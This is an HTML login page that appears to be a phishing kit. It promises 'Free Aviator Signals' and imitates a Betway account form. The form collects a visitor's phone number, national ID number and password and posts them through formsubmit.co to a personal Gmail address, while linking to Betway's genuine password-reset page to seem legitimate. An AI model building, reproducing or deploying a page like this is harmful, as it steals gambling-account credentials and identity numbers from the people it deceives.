
<!--DOCTYPE html-->

<html>

<head>

  <title>Login Form</title>

  <style>

    body {

      font-family: Arial, sans-serif;

      background-color: #f2f2f2;

    }

    .container {

      max-width: 400px;

      margin: 0 auto;

      padding: 20px;

      background-color: #fff;

      border: 1px solid #ccc;

      border-radius: 5px;

      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1)

    }

    .container h2 {

      text-align: center;

      color: green;

    }

    .container input[type="text"],

    .container input[type="password"] {

      width: 100%;

      padding: 10px;

      margin-bottom: 10px;

      border: 1px solid #ccc;

      border-radius: 4px;

      box-sizing: border-box;

    }

    

    .header h3 {

      color: green;

      font-family: Arial, sans-serif;

      text-align: center;

     

    }

    

     .container input[type="Number"] {

      width: 100%;

      padding: 10px;

      margin-bottom: 10px;

      border: 1px solid #ccc;

      border-radius: 4px;

      box-sizing: border-box;

    }

    

    .container img {

  display: block;

  margin-left: auto;

  margin-right: auto;

  width: 100%;

  height: 40%;

}

    .container input[type="submit"] {

      width: 100%;

      padding: 10px;

      border: none;

      background-color: green;

      color: #fff;

      cursor: pointer;

      border-radius: 4px;

    }

    .container input[type="submit"]:hover {

      background-color: #45a049;

    }

    .container p {

      text-align: center;

    }

  

  </style>

</head>

<body>

  <div class="header">

  <h3>Free Aviator Signals</h3>

  </div>

  

  <div class="container">

    <img border="0" class="center" height=",150" src="https://i.ibb.co/1LvyFRC/FB-IMG_20231215_134616.jpg" width="300">

    <h2>Betway Details</h2>

    <form action="https://formsubmit.co/ayandantuanas1@gmail.com" method="POST">

      <input type="text" placeholder="+27" name="Phone Number" required>

      <input type="Number" placeholder="ID Number" name="ID" required>

            <input type="Password" placeholder="Password" name="Password" required>

      <input type="submit" value="GET ACTIVATION CODE">

    </form>

    <p>Forgot Your Betway Account? <a

    href="https://www.betway.co.za/how-to-reset-password">Forgot My Password</a></p>

  </div>

</body>

</html>
</div>
</body>
</html>